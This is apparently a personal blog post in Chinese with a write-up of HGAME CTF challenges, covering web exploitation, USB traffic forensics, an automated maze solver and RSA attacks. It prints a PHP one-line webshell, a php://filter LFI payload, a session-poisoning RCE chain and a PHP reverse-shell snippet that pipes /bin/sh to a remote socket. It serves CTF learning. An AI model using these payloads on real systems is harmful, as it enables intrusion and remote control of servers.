HGAME正赛writeup

#闲扯一句

这次的HGAME我收获挺大的,认识了好多大佬,

当然也感谢大佬们抬手让了我拿了第一(1000块~),

当然我觉得最主要的原因是性感出题人hammer在线解题,

让我做出来了,真滴非常感谢

这次的比赛学到了很多,让我慢慢想一想

已经过去3天了。题目都关了,我只能想着写writeup。。

#web1

LFI RCE

首先是web1,web1一开始就一个界面看着很像我周末N1ctf做的题目

界面的是index.php,然后我看到登录框和密码框就一直想着用sql中注入来登录,

后来出题的Alias给了我们hint 是LFI,我用了burpsuite抓包发现有一个login,我居然

以为LFI在这里。。然后做不出来了。

直到最后一小时,我做不了别的题目了,开始私聊出题人=。=

出题人真的是非常有意思,开始跟我讲你刚刚进去一个网站,

发现登录框了,你先要干嘛,我想了想毫不犹豫的说sql注入了!

现在想想=。=当然是先注册了,就登陆了registe.php,发现可以注册

注册完之后登录主页面,然后我就看到了LFI的入口,

用php的伪协议可以读取所有的源代码

php://filter/read=convert.base64-encode/resource=upload.php

还好我源代码保存了

审计了一下代码发现漏洞出现在

漏洞的地方

虽然有白名单但是白名单没有过滤$和[]

注册一个账号为一句话木马就可以控制SESSION,用伪协议包含session文件路径就可以RCE

<?php @eval($_POST[value]); ?> 为账号名字

所以会话的目录为var/lib/php5/sess_加上上面的PHPSESSID,然后我没做出来=。=

#后来看了司大佬的博客

了解到了一个https://www.leavesongs.com/PHP/backshell-via-php.html

讲如何不用语言来做反弹shell

$sock = fsockopen($ip, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open(‘/bin/sh’, $descriptorspec, $pipes); proc_close($process);

主要代码=,=看司大佬成功拿到shell,强无敌

#web2(ssrf)

这题真的坑,hammer应该是没想到我们这么菜,真的是体现出了性感出题人的重要性

首先又是一个登陆框。我就觉得要用sql注入,然后一直不能注入就很绝望。不做了。。

回过头来,hammer给了一个hint:弱口令,还给了字典。。。。。

我就用bp跑了一下,终于登陆了,打开F12发现了一个目录,

输入到地址框,进入到一个叫gogogo的地方

之后就是ssrf了,本地文件读取漏洞,我一直使用的是http协议

又经过出题人一番提醒于是我使用了file协议,之后就开始代码审计了

@$_ENV = $_POST;
function MyCode($request){
    $_ENV[c] = base64_decode($_ENV[c]);
	print_r($request);
    $request($_ENV[c]);
}
@call_user_func('MyCode', $_GET['func']);

主要的问题是php函数中的call_user_func函数,google一下就会发现有代码执行漏洞

构造的就是func为php的函数,c是一个执行代码,就可以执行linux漏洞了

使用ls先查看当前的文件夹有一个readme.txt,打开来就有flag。

hammer说原来还打算要内网渗透的所以需要先拿到webshell

可惜我不知道怎么拿webshell绝望=。=

感觉自己是个大菜鸡

MISC

#MISC1(唯一的一血。usb流量包)

这道题主要是wireshark的usb流量包的读取

首先打开wireshark

上网查找一下usb_interrupt 就可以知道这个USB流量包

tshark -r pswd.pcap -T fields -e usb.capdata | grep -E “^.{23}$” | grep -v 00:00:00:00:00:00:00:00 > data.txt

就可以将所有的usb导入下来

这样的一个文件然后在用脚本跑一下,脚本我放blog了,简书不好看=。=

按着拼音输入就可以拿到flag了

#MISC3(python 走迷宫)

这道题我觉得是PPC,所有的代码都得自己现编,不过还是挺简单的,

自动走迷宫=、=,主要代码在这

import requests
import re
from bs4 import BeautifulSoup
maze=[]
maze_1=[]
maze_2=[]

se=requests.session()
url='http://111.230.105.104:5000/login'
leve1='http://111.230.105.104:5000/level{}'
ht=se.get(url)
url_1=url+'?username=dsafa'
temp=0
h = se.get(url_1)
while(temp<5):
    maze=[]
    maze_1=[]
    maze_2=[]
    reg=r'<li>(.*?)</li>'
    content=re.findall(reg,h.text)

    for i in range(len(content)):
        maze.append(list(content[i]))
    for i in range(len(maze)):
        maze_1=[]
        for j in range(len(maze[i])):
            if maze[i][j]=='1':
                maze_1.append(0)
            if maze[i][j]=='0':
                maze_1.append(1)
        maze_2.append(maze_1)
    print(maze_2)


    route_stack = [[0, 0]]
    route_history = [[0, 0]]
    source = maze_2
    length=len(maze_2)-1
    def up(location):
        # 横坐标为0,无法再向上走
        if location[1] == 0:
            return False
        else:
            new_location = [location[0], location[1] - 1]
            # 已经尝试过的点不会尝试第二次
            if new_location in route_history:
                return False
                # 碰到墙不走
            elif source[new_location[0]][new_location[1]] == 1:
                return False
            else:
                route_stack.append(new_location)
                route_history.append(new_location)
                return True

    def down(location):
        if location[1] == length:
            return False
        else:
            new_location = [location[0], location[1] + 1]
            if new_location in route_history:
                return False
            elif source[new_location[0]][new_location[1]] == 1:
                return False
            else:
                route_stack.append(new_location)
                route_history.append(new_location)
                return True

    def left(location):
        if location[0] == 0:
            return False
        else:
            new_location = [location[0] - 1, location[1]]
            if new_location in route_history:
                return False
            elif source[new_location[0]][new_location[1]] == 1:
                return False
            else:
                route_stack.append(new_location)
                route_history.append(new_location)
                return True

    def right(location):
        if location[0] == length:
            return False
        else:
            new_location = [location[0] + 1, location[1]]
            if new_location in route_history:
                return False
            elif source[new_location[0]][new_location[1]] == 1:
                return False
            else:
                route_stack.append(new_location)
                route_history.append(new_location)
                return True

    lo = [0, 0]
    while route_stack[-1] != [length, length]:
        if up(lo):
            lo = route_stack[-1]
            continue
        if down(lo):
            lo = route_stack[-1]
            continue
        if left(lo):
            lo = route_stack[-1]
            continue
        if right(lo):
            lo = route_stack[-1]
            continue
        route_stack.pop()
        lo = route_stack[-1]
    print(route_stack)
    payload='?solve='
    for z in route_stack:
        payload+='{},{}|'.format(z[0],z[1])
    print(payload[:-1])
    temp+=1
    xml=leve1.format(temp)+payload[:-1]
    h=se.get(xml)
    print(xml,h.text)
    print(h.url)

瞬间走迷宫!!特别快

CRYPTO

一开始我以为这道题应该是低指数加密攻击,因为e可以取很低很低

结果跑了好久好久也没出结果

低指数加密攻击的代码

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import gmpy2,time

n=20009825321190817147963347442051848645000336424386939346276080303892938830978468883865096939010369211164496889554066362250659588656220842298166858655661318127372829597289087967547380136236626386470544343488308698913083828327292168712942475361870205910005035784342397506041791253029844494366387369699503134262891657189794050207749021028042635934918483017590572519580475948828187908443010713579723232915388260644322050961965307559877185043552130449517605233267873185739089790172109615861449171354606776131859765582549508046458007187356147775319574096663927646674967596503275755780154113292912277977650441567509457140143
e=2
c=11276768387639406169997533231062879430250136462512305127468735804849144724322098825651714250497166921684637563615970313478015998022841728073463694100833054875547140603479102218063033283024559033814543704665745305248197661146142121489172277735609441674723512858942001843838519086085091246645803803954875859233140684712680996684763144909422624752609564963732987239868247045418557656861860399004635444939531315079261663096466536784791883115937389245561776662381289412756713590876961018174315777429441413604654165274391861765190068056444464207139020429656290530404739547061849380150209984938360867220233189580698079032411
i=0
print ('n=', n)
print ('c=', c)

print ('[+]Detecting m...')
s=time.clock()

while 1:
   m, b = gmpy2.iroot(c + i * n, 2)
   if b:
      print ('  [-]m is: ' + '{:x}'.format(int(m)).decode('hex'))
      break
   print ('  [-]i = %d\r' % i)
   i = i+1
print ('[!]Timer:', round(time.clock() - s, 2), 's')

吃完饭又搜索了一下,发现还有一个共模攻击

 

#coding=utf-8
import sys;
from libnum import n2s,s2n
sys.setrecursionlimit(100000);
def egcd(a, b):
 if a == 0:
 return (b, 0, 1)
 else:
 g, y, x = egcd(b % a, a)
 return (g, x - (b // a) * y, y)
def modinv(a, m):
 g, x, y = egcd(a, m)
 if g != 1:
 raise Exception('modular inverse does not exist')
 else:
 return x % m
def main():
 n=20009825321190817147963347442051848645000336424386939346276080303892938830978468883865096939010369211164496889554066362250659588656220842298166858655661318127372829597289087967547380136236626386470544343488308698913083828327292168712942475361870205910005035784342397506041791253029844494366387369699503134262891657189794050207749021028042635934918483017590572519580475948828187908443010713579723232915388260644322050961965307559877185043552130449517605233267873185739089790172109615861449171354606776131859765582549508046458007187356147775319574096663927646674967596503275755780154113292912277977650441567509457140143
 e1=2
 c1=11276768387639406169997533231062879430250136462512305127468735804849144724322098825651714250497166921684637563615970313478015998022841728073463694100833054875547140603479102218063033283024559033814543704665745305248197661146142121489172277735609441674723512858942001843838519086085091246645803803954875859233140684712680996684763144909422624752609564963732987239868247045418557656861860399004635444939531315079261663096466536784791883115937389245561776662381289412756713590876961018174315777429441413604654165274391861765190068056444464207139020429656290530404739547061849380150209984938360867220233189580698079032411
 e2=3
 c2=16452779450763971914698811803290894636946434233714240923652445151181235307730429230871917234313847776379269766015102031787432279967530714524593748669312007144984943102312569656652223054616094129029205448272347999621516346713482991540344552871019415848552344771877131758918795007204873493465573061262369041506025857598595789892854705303491632611693656149181574894384070822263780505875081262497155669358233585529665242779267340189298466267898266958632397542263440571419017299620165710998158797975480780443930675580678078416622088114976015059479550018213099890092963341616530135219960729222370369694327396683747010751415

s = egcd(e1, e2)
 s1 = s[1]
 s2 = s[2]
 # 求模反元素
 if s1<0:
 s1 = - s1
 c1 = modinv(c1, n)
 elif s2<0:
 s2 = - s2
 c2 = modinv(c2, n)
 m = (pow(c1,s1,n)*pow(c2,s2,n))%n
 print m
 print n2s(m)
if __name__ == '__main__':
 main()

执行了一下

 这个也挺坑爹的。。答案居然藏在里面,我一直以为是假的。

发表评论

电子邮件地址不会被公开。 必填项已用*标注